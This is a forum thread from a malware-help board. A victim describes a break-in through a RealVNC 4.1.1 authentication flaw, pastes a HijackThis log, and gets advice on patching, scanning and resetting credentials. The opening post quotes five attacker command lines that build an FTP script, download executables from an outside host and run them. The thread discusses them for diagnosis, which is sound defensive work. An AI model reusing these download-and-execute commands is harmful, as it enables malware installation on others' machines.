Hacking Realvnc v4.1.1

[Louie1462]

I have realvnc 4.1.1 installed on my computer. I am in China behind the university proxy, however, i got to thinking if they can't afford central heating than why invest in good firewall?  I was working on my computer, looked down to notice the vnc icon black indicating someone was logged on.  I didn't think much of it at first (friends playing a joke), later I went into the start/run only to find this...

cmd.exe /c del i&echo open 10.141.104.183 32038 > i&echo user 1 1 >> i &echo get 070.exe >> i &echo quit >> i &ftp -n -s:i &070.exe&del i&exit

cmd.exe /c del i&echo open 10.141.104.183 32038 > i&echo user 1 1 >> i &echo get 311.exe >> i &echo quit >> i &ftp -n -s:i &311.exe&del i&exit

cmd.exe /c del i&echo open 10.12.82.118 26789 > i&echo user 1 1 >> i &echo get 230.exe >> i &echo quit >> i &ftp -n -s:i &230.exe&del i&exit

cmd.exe /c del i&echo open 10.141.104.183 32038 > i&echo user 1 1 >> i &echo get 634.exe >> i &echo quit >> i &ftp -n -s:i &634.exe&del i&exit

cmd.exe /c del i&echo open 10.141.104.183 32038 > i&echo user 1 1 >> i &echo get 634.exe >> i &echo quit >> i &ftp -n -s:i &634.exe&del i&exit

I ran hijack this to look for anything suspicious but I have limited experience with the software and don't feel the need to make more problems.  Here is the list...

Logfile of HijackThis v1.99.0
Scan saved at 1:05:15 PM, on 12/1/2006
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Common Files\Symantec Shared\ccSetMgr.exe
C:\Program Files\Common Files\Symantec Shared\SNDSrvc.exe
C:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Common Files\Symantec Shared\ccApp.exe
C:\Program Files\Symantec\LiveUpdate\ALUSchedulerSvc.exe
C:\Program Files\New Programs\Cisco Systems\VPN Client\cvpnd.exe
C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\Program Files\New Programs\Norton SystemWorks\Norton AntiVirus\navapsvc.exe
C:\Program Files\New Programs\Norton SystemWorks\Norton AntiVirus\IWP\NPFMntor.exe
C:\PROGRA~1\NEWPRO~1\NORTON~1\NORTON~1\NPROTECT.EXE
C:\PROGRA~1\NEWPRO~1\NORTON~1\NORTON~1\SPEEDD~1\NOPDB.EXE
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Common Files\Symantec Shared\CCPD-LC\symlcsvc.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\Program Files\New Programs\Trillian2\Trillian\trillian.exe
C:\Program Files\New Programs\DVD Region+CSS Free\DVDRegionFree.exe
C:\Program Files\New Programs\Microsoft Office\OFFICE11\OUTLOOK.EXE
C:\Program Files\New Programs\Microsoft Office\OFFICE11\WINWORD.EXE
C:\Program Files\New Programs\iTunes\iTunes.exe
C:\Program Files\New Programs\Mozilla\firefox.exe
C:\WINDOWS\system32\wuauclt.exe
C:\Documents and Settings\Louiethesecond\Desktop\HijackThis.exe

O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\NEWPRO~1\spybot\SDHelper.dll
O2 - BHO: DriveLetterAccess - {5CA3D70E-1895-11CF-8E15-001234567890} - C:\WINDOWS\system32\dla\tfswshx.dll
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.5.0_06\bin\ssv.dll
O2 - BHO: NAV Helper - {BDF3E430-B101-42AD-A544-FADC6B084872} - C:\Program Files\New Programs\Norton SystemWorks\Norton AntiVirus\NavShExt.dll
O2 - BHO: FlashFXP Helper for Internet Explorer - {E5A1691B-D188-4419-AD02-90002030B8EE} - C:\PROGRA~1\FlashFXP\IEFlash.dll
O3 - Toolbar: Norton AntiVirus - {42CDD1BF-3FFB-4238-8AD1-7859DF00B1D6} - C:\Program Files\New Programs\Norton SystemWorks\Norton AntiVirus\NavShExt.dll
O4 - HKLM\..\Run: [ccApp] "C:\Program Files\Common Files\Symantec Shared\ccApp.exe"
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKCU\..\Run: [Norton SystemWorks] "C:\Program Files\New Programs\Norton SystemWorks\cfgwiz.exe" /GUID {05858CFD-5CC4-4ceb-AAAF-CF00BF39736A} /MODE CfgWiz
O4 - HKCU\..\Run: [AnyDVD] "C:\Program Files\New Programs\SlySoft\AnyDVD\AnyDVD.exe"
O4 - Startup: Adobe Gamma.lnk = C:\Program Files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe
O4 - Startup: Norton Disk Doctor.LNK = C:\Program Files\New Programs\Norton SystemWorks\Norton Utilities\NDD32.EXE
O8 - Extra context menu item: &Search - http://bar.mywebsearch.com/menusearch.html?p=ZNxdm117YYUS
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\NEWPRO~1\MICROS~1\OFFICE11\EXCEL.EXE/3000
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_06\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_06\bin\ssv.dll
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\NEWPRO~1\MICROS~1\OFFICE11\REFIEBAR.DLL
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O12 - Plugin for .pdf: C:\Program Files\Internet Explorer\PLUGINS\nppdf32.dll
O16 - DPF: {17492023-C23A-453E-A040-C7C580BBF700} (Windows Genuine Advantage Validation Tool) - http://go.microsoft.com/fwlink/?linkid=39204
O16 - DPF: {644E432F-49D3-41A1-8DD5-E099162EEEC5} (Symantec RuFSI Utility Class) - http://security.symantec.com/sscv6/SharedContent/common/bin/cabsa.cab
O16 - DPF: {6E32070A-766D-4EE6-879C-DC1FA91D2FC3} (MUWebControl Class) - http://update.microsoft.com/microsoftupdate/v6/V5Controls/en/x86/client/muweb_site.cab?1159886127109
O16 - DPF: {AB86CE53-AC9F-449F-9399-D8ABCA09EC09} (Get_ActiveX Control) - https://h17000.www1.hp.com/ewfrf-JAVA/Secure/HPGetDownloadManager.ocx
O17 - HKLM\System\CCS\Services\Tcpip\..\{B7377013-06DF-44AC-9B85-1FD79ACA2B63}: NameServer = 10.10.0.21
O17 - HKLM\System\CCS\Services\Tcpip\..\{CF1CA91A-F7FF-4D82-8D38-25E9BDFFFBCF}: NameServer = 10.10.0.21 10.10.0.29
O18 - Protocol: cetihpz - {CF184AD3-CDCB-4168-A3F7-8E447D129300} - C:\Program Files\HP\hpcoretech\comp\hpuiprot.dll
O23 - Service: Adobe LM Service - Adobe Systems - C:\Program Files\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe
O23 - Service: Ati HotKey Poller - ATI Technologies Inc. - C:\WINDOWS\system32\Ati2evxx.exe
O23 - Service: Automatic LiveUpdate Scheduler - Symantec Corporation - C:\Program Files\Symantec\LiveUpdate\ALUSchedulerSvc.exe
O23 - Service: Symantec Event Manager - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe
O23 - Service: Symantec Password Validation - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\ccPwdSvc.exe
O23 - Service: Symantec Settings Manager - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\ccSetMgr.exe
O23 - Service: Cisco Systems, Inc. VPN Service - Cisco Systems, Inc. - C:\Program Files\New Programs\Cisco Systems\VPN Client\cvpnd.exe
O23 - Service: InstallDriver Table Manager - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: iPod Service - Apple Computer, Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: LiveUpdate - Symantec Corporation - C:\PROGRA~1\Symantec\LIVEUP~1\LUCOMS~2.EXE
O23 - Service: Norton AntiVirus Auto-Protect Service - Symantec Corporation - C:\Program Files\New Programs\Norton SystemWorks\Norton AntiVirus\navapsvc.exe
O23 - Service: NBService - Nero AG - C:\Program Files\Nero\Nero 7\Nero BackItUp\NBService.exe
O23 - Service: Norton AntiVirus Firewall Monitor Service - Symantec Corporation - C:\Program Files\New Programs\Norton SystemWorks\Norton AntiVirus\IWP\NPFMntor.exe
O23 - Service: Norton Unerase Protection - Symantec Corporation - C:\PROGRA~1\NEWPRO~1\NORTON~1\NORTON~1\NPROTECT.EXE
O23 - Service: Pml Driver HPZ12 - HP - C:\WINDOWS\system32\HPZipm12.exe
O23 - Service: Remote Packet Capture Protocol v.0 (experimental) - Unknown - %ProgramFiles%\WinPcap\rpcapd.exe (file missing)
O23 - Service: SAVScan - Symantec Corporation - C:\Program Files\New Programs\Norton SystemWorks\Norton AntiVirus\SAVScan.exe
O23 - Service: ScriptBlocking Service - Symantec Corporation - C:\PROGRA~1\COMMON~1\SYMANT~1\SCRIPT~1\SBServ.exe
O23 - Service: Symantec Network Drivers Service - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\SNDSrvc.exe
O23 - Service: Symantec SPBBCSvc - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\SPBBC\SPBBCSvc.exe
O23 - Service: Speed Disk service - Symantec Corporation - C:\PROGRA~1\NEWPRO~1\NORTON~1\NORTON~1\SPEEDD~1\NOPDB.EXE
O23 - Service: Symantec Core LC - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\CCPD-LC\symlcsvc.exe
O23 - Service: VNC Server Version 4 - RealVNC Ltd. - C:\Program Files\new programs\RealVNC\VNC4\WinVNC4.exe


My questions are, what are the scripts entered into my run console, what will these do to my computer, is this a serious issue, how do i fix these problems and more importantly prevent anything like this from happening again? 

Thanks for your help,

Louie

[mauserme]

Welcome to the forum Louie.

There is a known flaw in the way RealVNC v4.1.1 authenticates clients that allows unrestricted access to the host. You need to update to the current version as soon as possible.  See this

http://www.kb.cert.org/vuls/id/117929


The commands you've seen are the work of the hacker.  A command window is opened and a text file name "i" is written to disk.  This file contains batched ftp commands to download various files (070.exe, 311.exe, 230.exe, and 634.exe in your case).  The downloaded files are run and "i" is deleted.

There are a couple other threads about this, the most recent being

http://forum.avast.com/index.php?topic=24667.0

After you update you will need to scan for whatever malware might have been downloaded and you should probably require new IDs and passwords for all users.  Make sure to revoke all the old credentials.  I haven't looked closely at your hijack this log (others on the forum have more expertise with this) but I do see you're running Norton.  You can scan with that but also scan with A-Squared and Super Antispyware.

EDIT:  You can also search you computer for the downloaded files and delete them if found.

[FreewheelinFrank]

Hi Louie1462,

Nothing bad evident from the log, except the MyWebSearch toolbar, which you may wish to uninstall as it may slow down your computer:

http://www.pchell.com/support/mywebsearch.shtml

However, HijackThis! does not always reveal everything. (And you're not using the latest version, by the way!) You should still do a full scan with an up-to-date AV, and probably also look for rootkits with a rootkit detector such as blacklight:

http://www.f-secure.com/blacklight/

You also need to update your Sun Java:

http://www.java.com/en/download/index.jsp

Make sure you uninstall all older versions from Control Panel>Add/Remove